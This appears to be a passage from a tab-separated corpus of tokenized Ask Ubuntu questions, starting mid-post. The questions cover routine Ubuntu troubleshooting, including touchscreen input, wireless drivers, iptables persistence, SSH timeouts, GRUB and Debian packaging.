third button emulation threshold ( 584 ) : 20 evdev wheel emulation ( 585 ) : 0 evdev wheel emulation axes ( 586 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 587 ) : 10 evdev wheel emulation timeout ( 588 ) : 200 evdev wheel emulation button ( 589 ) : 4 they were saved , i can see this in the following line : evdev axis inversion ( 574 ) : 1 , 1 however this has no effect on the touch-inputs , no change , same as described at the beginning . i have tried to invert the axis with input -- set-prop on a logitech mouse , it worked after executing the command . so i do not understand , why the axis are not inverted by the xinput -- set-prop command for the touchscreen . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- answer to 1st reply : thank you for reply tomas . xsetwacom -- list has no output . in my case the evdev driver is used . here is the output of the /var/log/xorg.0.log , for me looks normal . [ 1748.700 ] ( ii ) config/udev : adding input device lg display lgd-multitouch ( /dev/input/mouse1 ) [ 1748.701 ] ( ii ) no input driver specified , ignoring this device . [ 1748.701 ] ( ii ) this device may have been added with another device file . [ 1748.701 ] ( ii ) config/udev : adding input device lg display lgd-multitouch ( /dev/input/event8 ) [ 1748.701 ] ( ** ) lg display lgd-multitouch : applying inputclass `` evdev touchscreen catchall '' [ 1748.701 ] ( ii ) using input driver 'evdev ' for 'lg display lgd-multitouch' [ 1748.701 ] ( ** ) lg display lgd-multitouch : always reports core events [ 1748.702 ] ( ** ) evdev : lg display lgd-multitouch : device : `` /dev/input/event8 '' [ 1748.702 ] ( -- ) evdev : lg display lgd-multitouch : vendor 0x1fd2 product 0x64 [ 1748.702 ] ( -- ) evdev : lg display lgd-multitouch : found absolute axes [ 1748.702 ] ( -- ) evdev : lg display lgd-multitouch : found absolute multitouch axes [ 1748.702 ] ( -- ) evdev : lg display lgd-multitouch : found x and y absolute axes [ 1748.702 ] ( -- ) evdev : lg display lgd-multitouch : found absolute touchscreen [ 1748.702 ] ( ** ) option `` invertx '' `` yes '' [ 1748.702 ] ( ** ) option `` inverty '' `` yes '' [ 1748.702 ] ( ii ) evdev : lg display lgd-multitouch : configuring as touchscreen [ 1748.702 ] ( ** ) evdev : lg display lgd-multitouch : yaxismapping : buttons 4 and 5 [ 1748.702 ] ( ** ) evdev : lg display lgd-multitouch : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 1748.702 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1.1/2-1.1.1:1.0/input/input19/event8 '' [ 1748.702 ] ( ii ) xinput : adding extended input device `` lg display lgd-multitouch '' ( type : touchscreen , id 10 ) [ 1748.702 ] ( ii ) evdev : lg display lgd-multitouch : initialized for absolute axes . [ 1748.703 ] ( ** ) lg display lgd-multitouch : ( accel ) keeping acceleration scheme 1 [ 1748.703 ] ( ** ) lg display lgd-multitouch : ( accel ) acceleration profile 0 [ 1748.703 ] ( ** ) lg display lgd-multitouch : ( accel ) acceleration factor : 2.000 [ 1748.703 ] ( ** ) lg display lgd-multitouch : ( accel ) acceleration threshold : 4 meanwhile i have added the options `` invertx '' `` yes '' and `` inverty '' `` yes '' into /usr/share/x11/xorg.conf.d/10-evdev.conf so the corresponding section in 10-evdev.conf is as follows : section `` inputclass '' identifier `` evdev touchscreen catchall '' matchistouchscreen `` on '' matchdevicepath `` /dev/input/event* '' driver `` evdev '' option `` invertx '' `` yes '' option `` inverty '' `` yes '' endsection however , again , the axes are not inverted ( i did also some reboots ) . after reboot options option `` invertx '' `` yes '' option `` invertx '' `` yes '' result in output of xinput -- list-props 16 evdev axis inversion ( 574 ) : 1 , 1 but the axes are still not inverted . all these options have no effect . it seams as the evdev driver ignores all options settings and all settings done by xinput . i have also tried : option `` calibration '' `` 300 1920 400 1080 '' on the 1920x1080 touchscreen to see if this has an effect . but again , no effect . all option lines are ignored . please help .
246565	ubuntu 12.04 32 bit or 64 bit	i have used ubuntu for over 2 years now , with 64 bit version always . i have been using 12.04 64 bit ever since it was released . i usually use ubuntu for development and programming and little bit of browsing but all my other stuff happens in windows 7 . i have noticed that ubuntu can not use my dma and slows down my entire computer when ever i copy or move something as the processor usage spikes up . as my ubuntu distro has become quite slow , i am planning to re install it . will installing 32 bit version make any difference to the dma problem or the other hardware problems ? ( excessive processor usage etc ) . i do n't play games much , so i do n't need entire 6gb of my ram to be available always . also , can i give linux mint a try ? ( i like unity ) btw , processor is i3 thanks !
246578	iptables-persistent does n't load rules on boot	i have few iptables rules which i want to use permanently . so i 've installed iptables-persistent and save my rules in /etc/iptables/rules.v4 and /etc/iptables/rules.v6 . also i turn on autostart for iptables-persistent service $ sudo update-rc.d iptables-persistent defaults $ sudo update-rc.d iptables-persistent enable 2345 but after system starts iptables rules are still empty $ sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination and when i start iptables-persistent manually , it goes well $ sudo service iptables-persistent start * loading iptables rules ... * ipv4 ... * ipv6 ... $ sudo iptables -l chain input ( policy accept ) target prot opt source destination drop all -- domain.ru anywhere drop all -- srv246-131.domain.ru anywhere etc ... what am i missing ?
246584	xubuntu 12.04 , mouse cursor disappears	i have xubuntu 12.04 installed on my computer and there is an annoying problem with my mouse cursor . when i start the computer , it is usually fine , but if i leave it for a while it goes in sleeping mode , as it should , and then , e.g. , in an hour i wake it up from sleeping mode , the mouse cursor is not there . actually , it is only invisible but it is still active . if i hover with the mouse over some fields , they become highlighted as they should be when the mouse cursor is over them . clicking on them also works fine . the only problem is that i do n't see the cursor . if i restart the system , things move back to normal , but after the first sleeping mode the cursor disappears again . does any one know a solution ?
246586	gpu fan spins like crazy in 12.10 on hd 6870	i installed ubuntu 12.10 yesterday on my computer and everything is working fine apart from my gpu fan . for some reason , it spins to what sounds like 100 % and just stays there no matter what i do . i dual boot windows and i use ccc . i keep my fan speed at a constant 50 % and the hottest it gets is about 60c which i think is fine . why is ubuntu doing this ? i was going to install the propriety drivers but i read that they do n't work yet . anyway of solving this ?
246593	terminal : jump to directory found with find	this seems like an obvious question to me but i ca n't find the answer ... presume i want to find a certain txt-file in my project and in terminal i type : find -name test.txt as result i might get something like : ./directory1/directory2/directory3/directory4/test.txt how do i jump to directory4 without having to type the complete path ?
246594	tor error and usage	i am using tor and vidalia for privacy , when it opens it shows the dialog on seeing the log it shows i think that , i was not included in that control area.what i should do for adding me ( my username ) to /var/run/tor . is there any apps that useful for privacy , anti-surveillance , anti-censorship .. ?
246595	youtube yellow snow screen on google chrome	when i try to watch any video from youtube on the google chrome , my screen is totally normal but video is yellow snowy . what can i do about it ? thank you . aslan
246596	mess with installation of ubuntu alongside windows 7 after upgrading	some time ago i installed ubuntu 11.10 as a second os on my pc . primary os is win 7 . as i 'm running win 7 on a ssd , i had to move ubuntu to another harddrive . the installation actually worked and i got presented a boot-up screen with which operation system to choose . unfortunately ubuntu , once started never worked reliable . it was slow and freezing all the time . updates and upgrades could n't be installed and messed up grub so that neither ubuntu or windows could boot anymore . i then always had to restore grub ( 2 ) ? - no idea how i did this back then , guess i just followed some instructions on ubuntu.com . at least i was always able to use win 7 again after that . today i gave it another try and wanted to upgrade to 12.04 to see if i can get rid of all the problems . i used this tutorial : how do i upgrade from 10.04 or 11.10 to 12.04 ? using the 12.04 live cd . as my 11.10 system probably still was broken , i never made it to the option that suggests to `` upgrade ubuntu 11.10 to 12.04 lts '' . instead , at some point , i got an option like `` reinstall 12.04 lts '' which is strange , because i was n't aware to have already installed 12.04 . but i did this and guess what , could n't start win7 nor ubuntu again . i then used the live cd again , found and installed `` boot-repair '' https : //help.ubuntu.com/community/boot-repair , which restored grub and let me start win 7 again . but the boot-up dialog to choose the operating system has gone completely . win 7 starts directly . boot-repair generated a report and i hope that you can help me with this mess maybe to get 12.04 running along with win 7 on my pc . here it is : http : //paste.ubuntu.com/1562399/ any help would be appreciated
246600	why does may wireless keep disconnecting ?	i have a lenovo b570e laptop after installing ubuntu 12.10 through windows 7 the wireless keeps disconnecting and reconnecting and finally keeps asking me for the wireless password again . i show several things i have tried . here is some data my wireless card is : ar9285 wireless network adapter ( pci-express ) ieee 802.11bgn and here is the output of several info requests ( required as i found during my search in many posts ) sudo lshw -c network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 9c : b7:0d:8b:2c:23 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-22-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory:90500000-9050ffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : f0 : de : f1 : cc : bc : a0 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.1.66 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:41 ioport:2000 ( size=256 ) memory:90404000-90404fff memory:90400000-90403fff and nm-tool networkmanager tool state : connected ( global ) device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : f0 : de : f1 : cc : bc : a0 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.66 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.2 dns : 192.168.1.3 device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : disconnected default : no hw address : 9c : b7:0d:8b:2c:23 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points amrfk : infra , 00:1e:73:4a:84:58 , freq 2437 mhz , rate 54 mb/s , strength 74 wpa and iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed frequency:2.462 ghz access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off and rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no 2 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 3 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no and sudo iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 scan completed : cell 01 - address : 00:1e:73:4a:84:58 channel:6 frequency:2.437 ghz ( channel 6 ) quality=57/70 signal level=-53 dbm encryption key : on essid : '' amrfk '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000ad81e542ab extra : last beacon : 644ms ago ie : unknown : 0005414d52464b ie : unknown : 010482848b96 ie : unknown : 030106 ie : unknown : 2a0106 ie : unknown : 32080c1218243048606c ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk cell 02 - address : 1c:1d:67:17 : d3:59 channel:11 frequency:2.462 ghz ( channel 11 ) quality=63/70 signal level=-47 dbm encryption key : on essid : '' vodafone1 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000021c934b08e9 extra : last beacon : 76ms ago ie : unknown : 0009566f6461666f6e6531 ie : unknown : 010882848b961224486c ie : unknown : 03010b ie : unknown : 2a0106 ie : unknown : 32040c183060 ie : unknown : 2d1a0c0117ff000000000000000000000000000000000c0000000000 ie : unknown : 3d160b000700000000000000000000000000000000000000 ie : unknown : 3e0100 ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : 0b050003567a12 ie : unknown : 7f0101 ie : unknown : dd07000c4304000000 ie : unknown : 0706414c20010d10 ie : unknown : dd1e00904c330c0117ff000000000000000000000000000000000c0000000000 ie : unknown : dd1a00904c340b000700000000000000000000000000000000000000 and iwlist chan eth0 no frequency information . lo no frequency information . wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz current frequency:2.462 ghz ( channel 11 ) and this did nothing lsmod | grep iwl and lsmod module size used by snd_hda_codec_hdmi 32049 1 snd_hda_codec_realtek 78048 1 joydev 17458 0 coretemp 13401 0 ghash_clmulni_intel 13221 0 cryptd 20404 1 ghash_clmulni_intel microcode 22804 0 uvcvideo 76750 0 videobuf2_core 32852 1 uvcvideo ideapad_laptop 18087 0 sparse_keymap 13891 1 ideapad_laptop rts5139 356200 0 snd_hda_intel 33492 3 snd_hda_codec 134213 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17699 1 snd_hda_codec snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec videodev 120310 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc btusb 22475 0 snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi wmi 19071 0 parport_pc 32689 0 snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event snd_timer 29426 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq mac_hid 13206 0 arc4 12530 2 bnep 18141 2 psmouse 95595 0 rfcomm 46620 12 snd 78921 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device ppdev 17074 0 bluetooth 209249 22 btusb , bnep , rfcomm i915 520621 3 lp 17760 0 parport 46346 3 parport_pc , ppdev , lp ath9k 131355 0 mac80211 539958 1 ath9k serio_raw 13216 0 ath9k_common 14056 1 ath9k ath9k_hw 395264 2 ath9k , ath9k_common ath 23828 3 ath9k , ath9k_common , ath9k_hw cfg80211 206797 3 ath9k , mac80211 , ath lpc_ich 17062 0 drm_kms_helper 49113 1 i915 soundcore 15048 1 snd drm 288721 4 i915 , drm_kms_helper snd_page_alloc 18485 2 snd_hda_intel , snd_pcm i2c_algo_bit 13414 1 i915 video 19336 1 i915 mei 40691 0 hid_generic 12541 0 usbhid 46987 0 hid 100411 2 hid_generic , usbhid r8169 61651 0 and sudo cat /var/log/syslog | grep -e iwl -e firmware -e wlan0 | tail -n25 jan 23 14:33:03 ubuntu networkmanager [ 829 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . jan 23 14:33:03 ubuntu networkmanager [ 829 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... jan 23 14:33:03 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jan 23 14:33:03 ubuntu networkmanager [ 829 ] : < info > activation ( wlan0/wireless ) : connection 'vodafone1 1 ' has security , and secrets exist . no new secrets needed . jan 23 14:33:03 ubuntu networkmanager [ 829 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . jan 23 14:33:03 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning jan 23 14:33:28 ubuntu networkmanager [ 829 ] : < warn > activation ( wlan0/wireless ) : association took too long . jan 23 14:33:28 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] jan 23 14:33:28 ubuntu networkmanager [ 829 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets jan 23 14:33:32 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > inactive jan 23 14:33:36 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : device state change : need-auth - > failed ( reason 'no-secrets ' ) [ 60 120 7 ] jan 23 14:33:36 ubuntu networkmanager [ 829 ] : < warn > activation ( wlan0 ) failed for connection 'vodafone1 1' jan 23 14:33:36 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jan 23 14:33:36 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] jan 23 14:33:39 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : device state change : disconnected - > unavailable ( reason 'none ' ) [ 30 20 0 ] jan 23 14:33:39 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] jan 23 14:33:39 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : taking down device . jan 23 14:33:43 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : bringing up device . jan 23 14:33:43 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : bringing up device . jan 23 14:33:43 ubuntu kernel : [ 4772.282159 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready jan 23 14:33:43 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) supports 4 scan ssids jan 23 14:33:43 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : supplicant interface state : starting - > ready jan 23 14:33:43 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] jan 23 14:33:43 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) : supplicant interface state : ready - > inactive jan 23 14:33:43 ubuntu networkmanager [ 829 ] : < info > ( wlan0 ) supports 4 scan ssids
246603	installed ubuntu 12.10 and no taskbar	so i installed ubuntu 12.10 ( from cd ) and there is no taskbar all the rest works just the bar is missing . my specifications are : amd k8 athlon 64/opteron 2 ghz hope someone can help me with this .
246604	usb tethering from ubuntu to android	i have an ubuntu 12.10 system on my pc and an android 4.1 system on my galaxy nexus . now i would like to share the internet connection of my pc via usb with my phone . i have been searching with google a lot , but i only found answers how you can share the internet connection of the phone with the pc , but i want it the other way around .
246617	local domain `` dev.my-example.com '' is not ignored by http-proxy	i have a ubuntu 12.04 desktop which uses a network proxy . i have created a virtual host : < virtualhost *:80 > serveradmin webmaster @ localhost servername dev.my-example.com documentroot /home/user/projects/my-example < directory / > options followsymlinks allowoverride all < /directory > < directory /home/user/projects/my-example/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride all options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /myex.error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /myex.access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride all order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > i did sudo a2ensite < virtualhostfile > and then sudo service apache2 restart i have added dev.my-example.com to /etc/hosts : 127.0.0.1 localhost dev.my-example.com and yes , there are files in the document root . ( yii framework 's initial file system . the permissions are all correct . ) i can ping the domain : $ ping -c4 dev.my-example.com ping localhost ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from localhost ( 127.0.0.1 ) : icmp_req=1 ttl=64 time=0.020 ms 64 bytes from localhost ( 127.0.0.1 ) : icmp_req=2 ttl=64 time=0.013 ms 64 bytes from localhost ( 127.0.0.1 ) : icmp_req=3 ttl=64 time=0.013 ms 64 bytes from localhost ( 127.0.0.1 ) : icmp_req=4 ttl=64 time=0.012 ms using dconf-editor , i added dev.my-example.com to the system - > proxy - > ignore-hosts setting : ignore-hosts [ 'localhost ' , '127.0.0.0/8 ' , 'my-example.com ' ] when i try to bring up the url in firefox , i get the following error : network error ( dns_server_failure ) your request could not be processed because an error occurred contacting the dns server . the dns server may be temporarily unavailable , or there could be a network problem . the problem is that the browser is ( somehow ) not ignoring the proxy server for this domain . but it does ignore dns for , say `` http : //localhost/phpmyadmin '' . what am i missing ?
246621	new to ubuntu , need a learning experience	i am quite new to ubuntu . i have just read a book on unix . i have no practical experience about working on linux . can anyone help me out on how do i go about , installing it on my machine ( laptop ) . which is presently running windows 7.i am a bit worried about losing the previously important files , in case things go wrong.yes , i am lagging a bit of confidence , to be specific . : p
246623	gtx 580 your system is running in low graphics mode	i could n't really understand any of the other threads with this name , and i really want help with it , so i 'm sorry about the duplicate . after i installed ubuntu 12.10 64bit it ran smoothly for a couple of days , and then when i booted up another day it came with the message : `` your system is running in low graphics mode '' . i followed a guide and reinstalled the `` deskop '' , then i installed the right graphics drivers : nvidia experimental 310 . then it ran smoothly for 2 days , and now the error is back again : / . so is there a way to permanently fix the problem ? thanks in advance . my build : gpu : asus nvidia geforce gtx 580 1.5gb cpu : intel i5.3470 ( 3.9ghz ) mb : gigabyte z77-d3h ram : kingston hyper-x duelchannel ddr3 4x4gb the system is running on a samsung 840 series sdd .
246624	how to disable downloading , file transfer and installation option in ubuntu ?	how to disable or password protect downloading , file transfer and installation option in ubuntu ? or how to customize it so that the we can not download , transfer and install any extra file after the os is functioning ?
246625	slowness initializing heroes of newerth	after a fresh boot it works 100 % . then maybe on a 30 day system it can start to take a long time to initialize . it usually goes through all the intro screens without problem . there 's a normal time this takes , on my computer . but now and again it takes more time , much more time . i have n't figured out what or where time is going , so to speak . either some kind of memory allocation , a programming error in the game or something else behind the scenes . changing cpufreq-set or letting it manage itself will impact performance when it 's running like it should and i 'm also getting cpu overheating messages in dmesg . but , these do n't seem to be appearing at the same time in time . i 'm using optirun and without it , running on intel gpu , it starts right away . so the problem is it 's not starting .
246631	what is the meaning of : xorg , display manager , x server ?	i do n't really have a problem , i was just wondering where i could find some documentation about what exactly x server , xorg , lightdm and stuff like that does.. i always stumble upon those terms , i know they have something to do regarding the graphics , but i 'd like to know more .
246638	access native functions in ubuntu phone	i 'm looking at app development for ubuntu phone and it really looks great ! but is it possible to access the native functionality of the phone like make a phone call or save a file ? the api documentation does only cover ui elements . regards andreas
246639	ubuntu 12.04 after update will not start	i was update my ubuntu 12.04 lts ..after that im restart system and get this > > in pic 1 asked a user name and password ..and you record your username and password correctly but then remained in this picture without response is no . 2 are there solutions to the problems you have to enter the recovry mode and i do repair packages and system files without interest 1 : pic 1 2 : pic 2 ~sorry for my weak english language
246640	trying to install smlnj on ubuntu 10.04 , repl not working	i have installed smlnj using sudo apt-get install smlnj , but when i try to run it on the cli using sml , i get this error /usr/lib/smlnj/bin/.run/run.x86-linux : 1 : syntax error : `` ( `` unexpected . i found this documentation http : //www.smlnj.org/dist/working/110.75/notes/install that suggested that you also need to have 32-bit support , so i also installed these suggested packages : apt-get install gcc-multilib g++-multilib ia32-libs , but i still get the same error . is there a different package that i need , or do i need to add something to my bash configuration to get this to work ?
246641	`shutdown -r now` command completely shutting down instead of restarting	hi we 've just installed ubuntu 12.04 lts onto a new server . it 's on a supermicro x9sca-f motherboard . now we 're aiming to locate this in a remote server room - however when we execute a shutdown -r now the system completly shuts down and has to be restarted using the power button ! ! i cant find any bios setting that seems applicable . any help/pointers greatly appreciated .
246644	headphone jack not working	i have hp dv6-6119tx in which i have 2 operating systems -ubuntu 12.04 ( and it is completely updated ) & win 7 ultimate . the earphone jack works properly in windows but it is not working in ubuntu.kindly help me out .
246645	how can i join the ubuntu irc channel and what should i expect ?	i 'm looking to chat to people about ubuntu , and i do n't think ask ubuntu is the right place , as i do n't have specific questions to be answered . i 've been told that i could join the irc channel for ubuntu . how do i do that ? what should i expect from ubuntu 's irc channel ?
246647	jpeg files to pdf	i have many jpeg files in a directory , and i want to convet them to pdf and concatenate them together to make a document . how can it be done ? preferably from the command line as it will be faster .
246648	how to restart ubuntu 12.04 using autokey	to restart ubuntu 12.04 you now have to open a terminal ( ctrl+alt+t ) , type `` sudo shutdown -r 0 '' , followed by your password . i have been trying to write a script in autokey to do this automatically , but ca n't manage to bring up the terminal window : keyboard.send_keys ( `` ++t '' ) does n't seem to work , so presumably an instruction to open gnome-terminal is needed . if anyone has a quick answer to this i would be very grateful - otherwise i 'll try to learn some debian coding ... .. thanks in advance , kaspin ''
246656	unable to ssh with error connection refused	i seem to be running into a problem when attempting to ssh . here is my scenario ; host a - 192.168.1.6 host b - 192.168.5.10 from host b , i am unable to ssh to host a , as i get the error '' ssh : connect to host 192.168.1.6 port 22 : connection timed out '' . however , what is weird is that i am able to ssh to any other hosts from host b to any host on the host a subnet except for host b 's ip . i ran the '' ssh -vvv host a '' from host b and then on host a i ran the `` netstat -nat |grep 22 '' this is the output as i see the sync_recv , but never gets established . netstat -nat |grep 22 tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 0 192.168.1.6:22 192.168.5.10:58882 syn_recv tcp 0 0 192.168.1.6:22 192.168.1.32:41564 established tcp 0 0 192.168.1.6:22 192.168.2.132:63086 established tcp6 0 0 : ::22 : : : * listen is there something that could be blocking it ? i have firewall turned off on both ends .
246657	how to replace an atypical pattern in a text file using sed	i have an mrtg configuration file containing lines starting with the word `` target '' . now in such lines there is a pattern starting with the character `` # '' , and ending with character `` : '' . a sample line could look like these ( note two types but start/end markers are still the same ) : target [ 192.168.0.1_gi1_1 ] : # gi1/1 : public @ 192.168.0.1 : : : ::2 target [ 192.168.0.1_gi1_31 ] : # gi1/31 : public @ 192.168.0.1 : : : ::2 what i need is for sed to find these lines and replace the pattern `` # gix/n : '' with '' ifinerrors # gix/n & ifinerrors # gix/n : '' , where x=1-9 , n=1-48 . so the two sample lines shown above would be modified to these : target [ 192.168.0.1_gi1_1 ] : ifinerrors # gi1/1 & ifinerrors # gi1/1 : public @ 192.168.0.1 : : : ::2 target [ 192.168.0.1_gi1_31 ] : ifinerrors # gi1/31 & ifinerrors # gi1/31 : public @ 192.168.0.1 : : : ::2
246659	install canon i-sensys lbp7200cdn network printer on ubuntu 12.10 64bit	i want to use canon i-sensys lbp7200cdn network printer with ubuntu 12.10 . i have read official documentation , this and this . i have not achieved any solution yet . i tried capt software versions 2.20 and 2.40 . all the manuals are different and always involve cups and ccpd services , but nothing helped me .
246662	how to package shared library in deb packages	my application uses some shared libraries , which i need to package with the binary , and as per debian policy rules it is recommended that supporting files and run-time support programs that do not need to be invoked manually by users , but are nevertheless required for the package to function , be placed ( if they are binary ) in a subdirectory of /usr/lib , preferably under /usr/lib/package-name . so , i put my shared library e.g . libabc.so in /usr/lib/myapp/ directory . after creating the debian package the binary fails to load as /usr/lib/myapp/ is not searched by the loader to load the directory . they do n't recommend using rpath in the binary . so what changes should i make in the debian package , in the postinst file or anything else to make it work .
246664	ubuntu upgrade to 12.10 in system which have raid 5	my system has one hdd ( where ubuntu is ) and 4 1½ tb sata drives in software raid 5 configuration . i just upgraded ubuntu from 12.04 to 12.10 . in the upgrade process it said some thing about raid . now when i boot the system ubuntu will not successfuly start . i think it tries boot from the raid array . is there anything to fix this problem .
246672	how to adjust mouse click debounce	how do you adjust the mouse click debouncing in ubuntu ? i recently bought an iogear wireless keyboard , and while most functions appear to work `` out-of-the-box '' , the builtin mouse keys seem to have no debouncing , so a single click usually registers as multiple clicks . this renders the mouse functionality incredibly frustrating , if not outright unusable . i tried the `` mouse settings '' dialog , but all it has is a slider to increase the allowable time between clicks in a double click , which is the exact opposite of what i want . e.g . it allows me to wait several seconds between clicks , and still have it register as a `` double click '' . i 'm looking for some what to say , `` if you detect two or more mouse clicks within 100ms , then ignore all but the first '' . how would i specify that ? i feel there might be some way to do this in xorg.conf but i 'm having trouble finding any documentation .
246673	3 monitors and 2 video cards ( intel and ati )	i 've moved to ubuntu from windows 7 . in w7 i had 3 monitors on 2 graphic cards . 2 monitors work from ati card and 1 from intel card . in ubuntu i ca n't make it to work like before . now works only 2 monitors from ati card . but i can switch to intel graphic monitor by pressing ctrl+alt+f6 ( so it works ) . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710 [ radeon hd 4350 ]
246674	can i retrieve my files from my hdd after windows crash by booting from usb ?	yesterday i tried turning on my toshiba satellite laptop but it started booting and crashed after showing a blue screen for half a second . and before i reinstall windows , i want to backup my files , so i created a bootable ubuntu usb drive , i booted from usb and i clicked try ubuntu , and then when i tried accessing my hdd 's it says unable to mount xxxxxxxxxx adding read acl for uid 999 to `/media/ubuntu ' failed : operation not supported so is that because i clicked try ubuntu ? or my hdd is dead ?
246682	how to upgrade gearman server on ubuntu 11.10	i am completely new to linux/ubuntu and command-line . at work i needed to install gearman server and workers on an ubuntu 11.10 rackspace box . i ran this command apt-get install gearman-job-server to install the server but it installed version 0.14 which is outdated from many years ago . is there a way i can just upgrade the package to the latest via command line ?
